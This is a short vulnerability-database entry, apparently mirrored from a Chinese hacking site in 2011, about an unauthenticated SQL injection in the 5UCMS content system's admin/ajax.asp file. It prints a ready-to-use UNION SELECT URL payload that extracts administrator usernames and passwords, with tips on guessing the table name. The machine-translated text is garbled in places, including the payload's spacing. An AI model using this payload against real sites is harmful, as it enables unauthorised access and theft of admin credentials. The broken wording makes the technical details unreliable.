Search...

5UCMS the latest injection vulnerability-vulnerability warning-the black bar safety net

2011-06-19T00:00:00

ID MYHACK58:62201130938
Type myhack58
Reporter 佚名
Modified 2011-06-19T00:00:00

Description

Once accidentally found 5UCMS a small vulnerability. Vulnerability file

Background directory/ajax. asp

Due to the non-background user authentication, resulting in not logged in can also access this file, the file existssql injection.

I today into the official to see if the vulnerability they have issued a repair Bulletin, here I put use released directly to storm out of the background account password.

http://127.0.0.1/admin/ajax.asp?Act=modeext&cid=1%20and%2 0 1=2%20UNION%20select%2 0 1 1 1%26Chr(1 3)%26Chr(1 0)%26username%26chr(5 8)%2 6 1%26Chr(1 3)%26Chr(1 0)%26password%26chr(5 8)%20from xxxx_Admin&id=1%20and%2 0 1=2%20UNION%20select%2 0 1%20from xxxx_Admin

xxxx_Admin this table name are generally them at the time of installation a custom order, and are generally used domain name,such as www. xxx. com this station

The table name is probably qing_admin everyone their own modifications. Nothing technical content is generally novice storm does not come out so the only issue to

Honestly, their program is still relatively safe can get out of a also good. For those of us rookie said.

Show: True|False|ERR: Object required proof that the table name is Tim write error.

After the success of the is as follows:

!

JSON Vulners Source

Initial Source

{"type": "myhack58", "references": [], "href": "http://www.myhack58.com/Article/html/3/62/2011/30938.htm", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-13T18:03:31", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-13T18:03:31", "rev": 2}, "vulnersScore": -0.4}, "edition": 1, "viewCount": 14, "id": "MYHACK58:62201130938", "published": "2011-06-19T00:00:00", "lastseen": "2016-11-13T18:03:31", "reporter": "\u4f5a\u540d", "modified": "2011-06-19T00:00:00", "title": "5UCMS the latest injection vulnerability-vulnerability warning-the black bar safety net", "description": "Once accidentally found 5UCMS a small vulnerability. Vulnerability file\n\nBackground directory/ajax. asp\n\nDue to the non-background user authentication, resulting in not logged in can also access this file, the file exists[sql injection](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>a).\n\nI today into the official to see if the vulnerability they have issued a repair Bulletin, here I put use released directly to storm out of the background account password.\n\nhttp://127.0.0.1/admin/ajax.asp?Act=modeext&cid=1%20and%2 0 1=2%20UNION%20select%2 0 1 1 1%26Chr(1 3)%26Chr(1 0)%26username%26chr(5 8)%2 6 1%26Chr(1 3)%26Chr(1 0)%26password%26chr(5 8)%20from xxxx_Admin&id=1%20and%2 0 1=2%20UNION%20select%2 0 1%20from xxxx_Admin \n\nxxxx_Admin this table name are generally them at the time of installation a custom order, and are generally used domain name,such as www. xxx. com this station\n\nThe table name is probably qing_admin everyone their own modifications. Nothing technical content is generally novice storm does not come out so the only issue to\n\nHonestly, their program is still relatively safe can get out of a also good. For those of us rookie said.\n\nShow: True|False|ERR: Object required proof that the table name is Tim write error.\n\nAfter the success of the is as follows:\n\n! [](/Article/UploadPic/2011-6/2011619162629187.jpg)\n"}